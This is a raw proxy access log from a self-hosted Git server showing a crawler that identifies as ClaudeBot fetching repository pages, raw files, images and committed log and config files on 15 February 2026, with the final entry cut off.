"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 10145] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" [Client 216.73.216.188] [Length 10920] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 216.73.216.188] [Length 13003] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 216.73.216.188] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 117479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 10741] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 216.73.216.188] [Length 14389] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 11535] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Ffallback_error.log" [Client 216.73.216.188] [Length 19362] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15597] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" [Client 216.73.216.188] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 216.73.216.188] [Length 11042] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf?display=source" [Client 216.73.216.188] [Length 13861] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log?display=source" [Client 216.73.216.188] [Length 122532] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10952] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10951] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js?display=rendered" [Client 216.73.216.188] [Length 10917] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16525] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13980] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 11231] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" [Client 216.73.216.188] [Length 10102] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14712] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" 